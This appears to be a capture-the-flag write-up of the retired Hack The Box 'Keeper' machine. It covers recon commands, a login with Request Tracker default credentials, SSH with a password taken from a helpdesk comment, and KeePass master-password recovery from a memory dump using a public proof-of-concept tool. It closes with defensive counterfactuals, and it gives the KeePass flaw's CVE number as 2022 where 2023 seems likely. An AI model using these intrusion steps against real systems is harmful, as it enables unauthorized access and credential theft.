~ / foobarto.me / htb-machines
--:--:-- UTC
~ / htb-machines / keeper.md

keeper

Linux · Easy · released 2023-08-12 · retired 2024-02-10

Summary

Keeper is an Easy Linux box that chains three entirely avoidable information-disclosure failures into root access. The first is a web helpdesk running with default credentials. The second is an administrator storing a user’s initial SSH password in a plaintext comment field inside that same helpdesk. The third is a crash dump and password database sitting unprotected in a user’s home directory, where CVE-2022-32784-style memory forensics reveals the database master password from typed keystrokes captured in the dump.

The foothold exploits the fact that Request Tracker ships with documented default credentials (root / password) and many deployments never change them. Once authenticated as admin, all user records are visible, including administrative comments intended only for internal use. The comment on lnorgaard’s account recorded her initial SSH password as plain text — a common but dangerous IT practice of using the helpdesk as a temporary credential store.

The privilege escalation is built around CVE-2022-32784, a KeePass vulnerability in which the master password protection process leaves fragments of each typed character in heap memory after the password entry dialog is dismissed. A PoC tool (vdohney/keepass-password-dumper) scans a process memory dump for these artifacts and reconstructs all but the first character of the master password. Here the dump produced the candidate pattern ?ødgrød med fløde — the body of a well-known Danish dessert phrase whose first character is trivial to guess. Opening the KDBX with the recovered master password revealed the keeper.htb (Ticketing Server) entry, whose notes field contained an unencrypted PuTTY private key for root. Converting that PPK to OpenSSH format with puttygen and SSHing as root completed the chain.

Recon

nmap -p- --min-rate 5000 -Pn -oA scans/alltcp <TARGET>
nmap -sCV -p 22,80 -Pn -oA scans/services <TARGET>

22/tcp  OpenSSH 8.9p1 Ubuntu
80/tcp  nginx 1.18.0

The web root redirects to http://tickets.keeper.htb/rt/, requiring a /etc/hosts entry before the site renders — a common HTB pattern for virtual-host-based services. The redirect immediately reveals the application type: Request Tracker, an open-source ticketing system that ships with published default credentials and a well-documented admin interface. Knowing the application name before login suggests testing those defaults, which succeed here. The RT version (4.4.4) is visible in the footer after login and confirms the installation is unpatched and likely running with default configuration throughout.

Foothold — RT default credentials

Request Tracker 4.4.4 accepted the default admin login (root / the publicly-documented default password). Once inside the admin panel, all user accounts and their internal notes are readable. Ticket 300000, “Issue with Keepass Client on Windows”, references a KeePass crash dump that was attached and later moved into Lise’s home directory. More critically, the RT user record for lnorgaard contains an administrative comment recording her initial SSH password in plaintext.

SSH as lnorgaard succeeds with that initial password:

ssh [email protected]

User flag

user.txt is in lnorgaard’s home directory, readable immediately upon login:

cat /home/lnorgaard/user.txt

Privilege escalation — KeePass CVE-2022-32784

The user’s home directory contains RT30000.zip, which unpacks to a KeePass process memory dump and a KDBX database:

KeePassDumpFull.dmp
passcodes.kdbx

CVE-2022-32784 is a KeePass vulnerability in which the master password entry process leaves character fragments in managed heap memory after the dialog closes. A PoC scanner (vdohney/keepass-password-dumper) reads these artifacts and reconstructs all but the first character:

git clone https://github.com/vdohney/keepass-password-dumper
cd keepass-password-dumper
dotnet run ../KeePassDumpFull.dmp

The tool outputs a pattern like ?ødgrød med fløde. The body of the phrase is a well-known Danish dessert name, and the missing first character (a single diacritic) is trivially guessable. Open passcodes.kdbx with the recovered master password. The keeper.htb (Ticketing Server) entry contains root’s credentials and, in the notes field, an unencrypted PuTTY-format SSH private key.

Save the PPK content to a file and convert it to OpenSSH format:

puttygen root.ppk -O private-openssh -o id_rsa_root
chmod 600 id_rsa_root
ssh -i id_rsa_root [email protected]

Why each step worked

Request Tracker’s default credentials persist in production because changing them requires a deliberate post-installation step that many administrators skip when deploying internal tools. The application is functional on first boot with root:password, and if no security review forces the change, it may stay that way indefinitely. Once an attacker has admin access to a helpdesk system, every user record and every ticket is readable — including administrative comments that were never meant to be externally visible.

Storing an initial password in a helpdesk comment is a pattern that emerges from convenience: the administrator needs somewhere to record the credential temporarily before handing it off, and the same system where the user account lives seems like a natural place. The risk is that the helpdesk becomes a credential store with no expiry enforcement and no secret-management controls. A password that was meant to be temporary and immediately changed can persist indefinitely in a comment field.

CVE-2022-32784 exploits a specific memory management behavior in KeePass’s secure string implementation. When a user types the master password, each character is processed through a ProtectedString object in .NET managed memory. Even after the password dialog is closed, the managed heap retains fragments of those string operations — not the complete password in sequence, but enough character-frequency artifacts that a dump scanner can reconstruct all but the first character. A full process dump preserves those patterns until the garbage collector reclaims them or the process exits.

Storing an unencrypted private key inside a KeePass entry notes field effectively collapses the security of the key onto the security of the database password. Once the master password is recovered, the key is recovered without any additional factor. This is especially consequential when the key is a root SSH key — it provides immediate privileged access to any host that trusts it.

Counterfactuals

Changing the RT admin password during installation closes the initial entry point completely. No other vulnerability in this chain is reachable until an attacker has admin access to RT, so enforcing a credential change as part of the deployment checklist collapses the entire attack chain at step one.

Eliminating plaintext passwords from helpdesk comments removes the pivot from RT access to SSH access. If initial credentials must be communicated through the helpdesk, they should be generated as one-time tokens with a short expiry — not stored as permanent comment text. A secrets manager or an automated “change password on first login” enforcement would have prevented lnorgaard’s initial password from remaining readable in a comment.

Patching KeePass to a version that includes the CVE-2022-32784 fix prevents the memory-dump reconstruction attack. In patched versions, the secure string implementation uses a different memory layout that does not leave recoverable character fragments in the heap. Separately, treating crash dumps as sensitive artifacts — restricting their storage, encrypting them at rest, and purging them after analysis — limits the window during which a dump is available for offline exploitation.

Storing an unencrypted private key in a password database entry breaks the key’s independence from the database. The private key should carry its own passphrase so that recovering the database is not sufficient alone. Alternatively, using certificate-based SSH with short-lived certificates would render any stored static key irrelevant.

Key Takeaways

References

← all htb machines hackthebox.com ↗